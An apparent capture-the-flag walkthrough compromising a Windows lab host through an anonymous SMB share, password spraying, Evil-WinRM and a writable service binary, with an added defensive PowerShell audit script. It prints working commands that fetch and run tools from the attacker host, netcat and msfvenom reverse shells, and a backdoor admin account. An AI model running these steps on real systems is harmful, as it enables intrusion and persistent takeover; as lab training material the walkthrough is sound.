From now on I’ve added my “MayorScan3000” portscanning tool into the equation when I’m kicking off, as folks have been telling me I waste time by not scanning all ports. So I juiced up my port scanner to run with threading enabled. Meanwhile I’ll still do my basic Nmap Scan as well to grab those immediate results.
nmap -p135,139,445,3389,5985 -A 172.31.1.18
Nmap doesn’t return much information, but we do see that SMB is running on the target, which can give us a good start. Let’s enumerate!
We can begin by inspecting the SMB service using smbclient.
smbclient -L 172.31.1.18
Running smbclient shows that there are several shares, with “backups” being accessible. We need to investigate this further.
smbclient \\\\172.31.1.18\\backups -U ''
Well this was pretty easy, right? We’ve discovered a misconfigured share that allows anonymous access to the C:\. Let’s exploit it!
With such unrestricted access to the file system, we should really search around some. We can quickly check the Users directory, which shows us the user “jamie.” Additionally, we can head to jamie’s Desktop and grab the user flag there.
User Flag on Jamie’s Desktop
Now that we have a flag and a username, we need to decide where to go from here. With a username in hand, we can test it against a password list. Let’s use CrackMapExec for this.
crackmapexec smb 172.31.1.18 -u jamie -p /root/Desktop/passes.txt
CrackMapExec makes quick work of locating a password for the user. We saw port 5985 (WinRM) open earlier, which means we can probably use Evil-WinRM to connect. Let’s do that.
evil-winrm -i 172.31.1.18 -u jamie -p redacted
We are successfully logged in! We see that we are jamie on the machine, and now we need to get to escalating our privileges. We can begin by starting a Python HTTP server on our attacking machine, pulling our tools over to the target, and running winPEAS.
powershell -c wget "http://10.10.0.7:8000/winPEAS.exe" -outfile "winPEAS.exe"; C:\Users\jamie\Documents\winPEAS.exe
Keep in mind that we are currently using PowerShell and need to provide the full program path in order to run it. Unfortunately, winPEAS doesn’t turn up any useful information about the machine or a path to escalation. The same was true of PowerUp.ps1. I started scratching my head for a moment and had to remind myself that there are plenty of ways to manually enumerate privileges, services, etc. Let’s do some of that.
Our user privileges don’t show much that we can take advantage of unfortunately. We can check for running services next.
services (not a typical way to execute this query)
The above took some trial and error because PowerShell uses “Get-Service” to list the running services, and that wasn’t working as expected. Running services did, however, which revealed the above. Of note are the monitor1 and monitor2 services. Unfortunately we cannot do much to gather more information on these from Evil-WinRM, so I decided to move to a reverse shell using Netcat and get out of PowerShell. This required me to transfer a Netcat.exe binary to the machine first, and then connect back to my Kali machine.
Top nc -nlvp 5555; Bottom C:\Users\jamie\Documents\nc.exe 10.10.0.7 5555 -e cmd.exe; Top – sc qc monitor1
We see that the service is running as LocalSystem, and that it can be started/stopped. Knowing this, we need to check whether we can modify the service’s directory and its contents. We can use icacls for this.
There is a lot going on in the above image, but what is important is that Users has RX and W in the results. This means that members of Users can read, execute, and write in the directory location. All we need to do now is replace monitor1.exe with a malicious executable and restart the service.
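The writable service directory found above is exactly what a defender should be hunting for across every service on a host. As an added example that is not part of the original post, the PowerShell audit below (run elevated on the host under review) resolves each service’s executable from its command line and reports any ACE that grants write-type rights to Everyone, Users, Guests, Authenticated Users or INTERACTIVE on the binary or its parent directory; the group list and the rights mask are my own assumptions.

```powershell
# Added audit script (not from the original post): list services whose executable,
# or its parent directory, grants write-type rights to low-privilege groups.
$LowPrivGroups = @('Everyone', 'BUILTIN\Users', 'BUILTIN\Guests',
                   'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE')
$Fsr = [System.Security.AccessControl.FileSystemRights]
# Rights that let a caller replace or alter the binary (assumed "write-type" set).
$WriteMask = [int]($Fsr::Write -bor $Fsr::Delete -bor $Fsr::DeleteSubdirectoriesAndFiles -bor
                   $Fsr::ChangePermissions -bor $Fsr::TakeOwnership)
$GenericWriteOrAll = 0x40000000 -bor 0x10000000   # GENERIC_WRITE | GENERIC_ALL (not in the enum)

function Get-ServiceBinaryPath([string]$PathName) {
    # Win32_Service.PathName is a full command line; extract just the executable.
    if ([string]::IsNullOrWhiteSpace($PathName)) { return $null }
    if ($PathName.StartsWith('"')) { return $PathName.Split('"')[1] }
    $m = [regex]::Match($PathName, '^(.*?\.exe)', 'IgnoreCase')
    if ($m.Success) { return $m.Groups[1].Value } else { return $PathName.Split(' ')[0] }
}

function Get-WeakAces([string]$Path) {
    # Allow ACEs on $Path that give a low-privilege group write-type rights.
    try { $acl = Get-Acl -LiteralPath $Path -ErrorAction Stop } catch { return @() }
    $hits = @()
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($LowPrivGroups -notcontains $ace.IdentityReference.Value) { continue }
        $rights = [int]$ace.FileSystemRights
        if ((($rights -band $WriteMask) -ne 0) -or (($rights -band $GenericWriteOrAll) -ne 0)) {
            $hits += "$($ace.IdentityReference.Value)=$($ace.FileSystemRights)"
        }
    }
    return $hits
}

function Find-WritableServiceBinaries {
    foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
        $exe = Get-ServiceBinaryPath $svc.PathName
        if (-not $exe) { continue }
        # A writable parent directory is as serious as a writable file: the binary can be replaced either way.
        foreach ($target in @($exe, (Split-Path -Path $exe -Parent))) {
            $weak = @(Get-WeakAces $target)
            if ($weak.Count -eq 0) { continue }
            [pscustomobject]@{ Service = $svc.Name; RunsAs = $svc.StartName
                               Path = $target; WeakAce = ($weak -join '; ') }
        }
    }
}

Find-WritableServiceBinaries | Format-Table -AutoSize -Wrap
```

Every hit is remediated by stripping the write-type ACE for that group from both the binary and its directory, so that only administrators (and the service account, if it genuinely needs it) can replace the file.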
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.0.7 LPORT=2246 -f exe > monitor1.exe
We can now move this to the target machine, start another Netcat listener to catch the shell, and start the service.
Left – powershell -c wget "http://10.10.0.7:8000/monitor1.exe" -outfile "monitor1.exe"; sc stop monitor1; Right – nc -nlvp 2246; Left – sc start monitor1; Right – reverse shell successful
A quick whoami shows that we are NT AUTHORITY\SYSTEM. We can quickly head to the Administrator’s Desktop to grab the system flag.
System.txt flag on Administrator’s Desktop
We can additionally do some Post-Exploitation to take full control of the machine.
Right – net user themayor !Password123 /add; net localgroup Administrators themayor /add; Left – xfreerdp /u:themayor /p:'!Password123' /v:172.31.1.18 RDP Login
A quick check of the server users shows that we are indeed a Server Admin now.